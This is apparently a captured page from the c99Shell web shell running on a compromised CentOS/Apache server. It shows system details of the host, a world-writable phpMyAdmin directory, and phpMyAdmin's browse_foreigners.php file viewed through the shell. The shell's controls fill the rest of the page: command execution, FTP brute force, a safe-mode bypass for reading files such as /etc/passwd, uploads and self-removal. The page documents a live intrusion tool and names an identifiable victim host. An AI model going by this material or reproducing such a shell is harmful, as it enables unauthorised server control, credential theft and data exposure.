!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     browse_foreigners.php (10.64 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* $Id: browse_foreigners.php,v 2.28 2005/12/11 20:20:14 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:
/**
 * display selection for relational field values
 */

/**
 * Gets a core script and starts output buffering work
 */
require_once('./libraries/common.lib.php');

PMA_checkParameters(array('db''table''field'));

require_once(
'./libraries/ob.lib.php');
if (
$cfg['OBGzip']) {
    
$ob_mode PMA_outBufferModeGet();
    if (
$ob_mode) {
        
PMA_outBufferPre($ob_mode);
    }
}
require_once(
'./libraries/header_http.inc.php');
$field urldecode($field);

/**
 * Displays the frame
 */
$per_page 200;
require_once(
'./libraries/relation.lib.php'); // foreign keys
require_once('./libraries/transformations.lib.php'); // Transformations
$cfgRelation PMA_getRelationsParam();
$foreigners  = ($cfgRelation['relwork'] ? PMA_getForeigners($db$table) : FALSE);

$override_total TRUE;

if (!isset(
$pos)) {
    
$pos 0;
}

$foreign_limit 'LIMIT ' $pos ', ' $per_page ' ';
if (isset(
$foreign_navig) && $foreign_navig == $strShowAll) {
    unset(
$foreign_limit);
}

require(
'./libraries/get_foreign.lib.php');

if (isset(
$pk)) {
    
$pk_uri '&amp;pk=' urlencode($pk);
    
?>
<input type="hidden" name="pk" value="<?php echo urlencode($pk); ?>" />
    <?php
} else {
    
$pk_uri '';
}

$gotopage '';
$showall '';

if (isset(
$disp_row) && is_array($disp_row)) {
    
$count count$disp_row );

    if ( 
$cfg['ShowAll'] && ($count $per_page) ) {
        
$showall '<input type="submit" name="foreign_navig" value="' $strShowAll '" />';
    }

    
$session_max_rows $per_page;
    
$pageNow = @floor($pos $session_max_rows) + 1;
    
$nbTotalPage = @ceil($count $session_max_rows);

    if ( 
$count $per_page ) {
        
$gotopage PMA_pageselector(
                      
'browse_foreigners.php?field='    urlencode($field) .
                                       
'&amp;'          PMA_generate_common_url($db$table)
                                                        . 
$pk_uri .
                                       
'&amp;fieldkey=' . (isset($fieldkey) ? $fieldkey '') .
                                       
'&amp;foreign_filter=' . (isset($foreign_filter) ? htmlspecialchars($foreign_filter) : '') .
                                       
'&amp;',
                      
$session_max_rows,
                      
$pageNow,
                      
$nbTotalPage
                    
);
    }
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
    xml:lang="<?php echo $available_languages[$lang][2]; ?>"
    lang="<?php echo $available_languages[$lang][2]; ?>"
    dir="<?php echo $text_dir?>">

<head>
    <title>phpMyAdmin</title>
    <meta http-equiv="Content-Type" content="text/html; charset=<?php echo $charset?>" />
    <link rel="stylesheet" type="text/css"
        href="./css/phpmyadmin.css.php?<?php echo PMA_generate_common_url'''' ); ?>&amp;js_frame=right" />
    <script src="./js/functions.js" type="text/javascript" language="javascript"></script>
    <script type="text/javascript" language="javascript">
    //<![CDATA[
    self.focus();
    function formupdate( field, key ) {
        if (opener && opener.document && opener.document.insertForm) {
            var field = 'field_' + field;

            <?php if ( isset( $pk ) ) { ?>
            var element_name = field + '[multi_edit][<?php echo urlencode$pk ); ?>][]';
            <?php } else { ?>
            var element_name = field + '[]';
            <?php ?>

            <?php if ( isset( $fieldkey ) ) { ?>
            var element_name_alt = field + '[<?php echo $fieldkey?>]';
            <?php } else { ?>
            var element_name_alt = field + '[0]';
            <?php ?>

            if (opener.document.insertForm.elements[element_name]) {
                // Edit/Insert form
                opener.document.insertForm.elements[element_name].value = key;
                self.close();
                return false;
            } else if (opener.document.insertForm.elements[element_name_alt]) {
                // Search form
                opener.document.insertForm.elements[element_name_alt].value = key;
                self.close();
                return false;
            }
        }

        alert('<?php echo PMA_jsFormat($strWindowNotFound); ?>');
    }
    //]]>
    </script>
</head>

<body id="body_browse_foreigners">

<form action="browse_foreigners.php" method="post">
<fieldset>
<?php echo PMA_generate_common_hidden_inputs$db$table ); ?>
<input type="hidden" name="field" value="<?php echo urlencode($field); ?>" />
<input type="hidden" name="fieldkey"
    value="<?php echo isset($fieldkey) ? $fieldkey ''?>" />
<?php if ( isset( $pk ) ) { ?>
<input type="hidden" name="pk" value="<?php echo urlencode($pk); ?>" />
<?php ?>
<span class="formelement">
    <label for="input_foreign_filter"><?php echo $strSearch ':'?></label>
    <input type="text" name="foreign_filter" id="input_foreign_filter"
        value="<?php echo isset($foreign_filter) ? htmlspecialchars($foreign_filter) : ''?>" />
    <input type="submit" name="submit_foreign_filter" value="<?php echo $strGo;?>" />
</span>
<span class="formelement">
    <?php echo $gotopage?>
</span>
<span class="formelement">
    <?php echo $showall?>
</span>
</fieldset>
</form>

<table width="100%">
<?php
if (isset($disp_row) && is_array($disp_row)) {
    
$header '<tr>
        <th>' 
$strKeyname '</th>
        <th>' 
$strDescription '</th>
        <td width="20%"></td>
        <th>' 
$strDescription '</th>
        <th>' 
$strKeyname '</th>
    </tr>'
;

    echo 
'<thead>' $header '</thead>' "\n"
        
.'<tfoot>' $header '</tfoot>' "\n"
        
.'<tbody>' "\n";

    
$values = array();
    
$keys   = array();
    foreach ( 
$disp_row as $relrow ) {
        if (
$foreign_display != FALSE) {
            
$values[] = $relrow[$foreign_display];
        } else {
            
$values[] = '';
        }

        
$keys[] = $relrow[$foreign_field];
    }

    
asort$keys );

    
$hcount 0;
    
$odd_row true;
    
$val_ordered_current_row 0;
    
$val_ordered_current_equals_data false;
    
$key_ordered_current_equals_data false;
    foreach ( 
$keys as $key_ordered_current_row => $value ) {
    
//for ( $i = 0; $i < $count; $i++ ) {
        
$hcount++;

        if (
$cfg['RepeatCells'] > && $hcount $cfg['RepeatCells']) {
            echo 
$header;
            
$hcount 0;
            
$odd_row true;
        }

        
$key_ordered_current_key $keys[$key_ordered_current_row];
        
$key_ordered_current_val $values[$key_ordered_current_row];

        
$val_ordered_current_key $keys[$val_ordered_current_row];
        
$val_ordered_current_val $values[$val_ordered_current_row];

        
$val_ordered_current_row++;

        if (
PMA_strlen$val_ordered_current_val ) <= $cfg['LimitChars']) {
            
$val_ordered_current_val htmlspecialchars($val_ordered_current_val);
            
$val_ordered_current_val_title '';
        } else {
            
$val_ordered_current_val_title =
                
htmlspecialchars$val_ordered_current_val );
            
$val_ordered_current_val =
                
htmlspecialcharsPMA_substr$val_ordered_current_val0,
                    
$cfg['LimitChars'] ) . '...' );
        }
        if (
PMA_strlen$key_ordered_current_val ) <= $cfg['LimitChars']) {
            
$key_ordered_current_val htmlspecialchars($key_ordered_current_val);
            
$key_ordered_current_val_title '';
        } else {
            
$key_ordered_current_val_title =
                
htmlspecialchars$key_ordered_current_val );
            
$key_ordered_current_val =
                
htmlspecialcharsPMA_substr$key_ordered_current_val0,
                    
$cfg['LimitChars'] ) . '...' );
        }

        if ( ! empty( 
$data ) ) {
            
$val_ordered_current_equals_data $val_ordered_current_key == $data;
            
$key_ordered_current_equals_data $key_ordered_current_key == $data;
        }

        
?>
    <tr class="<?php echo $odd_row 'odd' 'even'$odd_row = ! $odd_row?>">
        <td nowrap="nowrap">
        <?php
        
echo ($key_ordered_current_equals_data '<b>' '')
            .
'<a href="#" title="' $strUseThisValue
            
. ($key_ordered_current_val_title != '' ': ' $key_ordered_current_val_title '') . '"'
            
.' onclick="formupdate(\'' md5($field) . '\', \''
            
htmlspecialchars($key_ordered_current_key) . '\'); return false;">'
            
.htmlspecialchars($key_ordered_current_key) . '</a>' . ($key_ordered_current_equals_data '</b>' '');
        
?></td>
        <td>
        <?php
        
echo ($key_ordered_current_equals_data '<b>' '')
            . 
'<a href="#" title="' $strUseThisValue . ($key_ordered_current_val_title != '' ': '
            
$key_ordered_current_val_title '') . '" onclick="formupdate(\''
            
md5($field) . '\', \'' htmlspecialchars($key_ordered_current_key) . '\'); return false;">'
            
$key_ordered_current_val '</a>' . ($key_ordered_current_equals_data '</b>' '');
        
?></td>
        <td width="20%">
            <img src="<?php echo $GLOBALS['pmaThemeImage'] . 'spacer.png'?>"
                alt="" width="1" height="1"></td>

        <td>
        <?php
        
echo ($val_ordered_current_equals_data '<b>' '')
            . 
'<a href="#" title="' $strUseThisValue .  ($val_ordered_current_val_title != '' ': '
            
$val_ordered_current_val_title '') . '" onclick="formupdate(\'' md5($field)
            . 
'\', \'' htmlspecialchars($val_ordered_current_key) . '\'); return false;">'
            
$val_ordered_current_val '</a>' . ($val_ordered_current_equals_data '</b>' '');
        
?></td>
        <td nowrap="nowrap">
        <?php
        
echo ($val_ordered_current_equals_data '<b>' '') . '<a href="#" title="'
        
$strUseThisValue .  ($val_ordered_current_val_title != '' ': ' $val_ordered_current_val_title '')
        . 
'" onclick="formupdate(\'' md5($field) . '\', \''
        
htmlspecialchars($val_ordered_current_key) . '\'); return false;">' htmlspecialchars($val_ordered_current_key)
        . 
'</a>' . ($val_ordered_current_equals_data '</b>' '');
        
?></td>
    </tr>
        <?php
    
// end while
}
?>
</tbody>
</table>

</body>
</html>

<?php
/**
 * Close MySql connections
 */
if (isset($controllink) && $controllink) {
    @
PMA_DBI_close($controllink);
}
if (isset(
$userlink) && $userlink) {
    @
PMA_DBI_close($userlink);
}


/**
 * Sends bufferized data
 */
if (isset($cfg['OBGzip']) && $cfg['OBGzip']
    && isset(
$ob_mode) && $ob_mode) {
     
PMA_outBufferPost($ob_mode);
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0394 ]--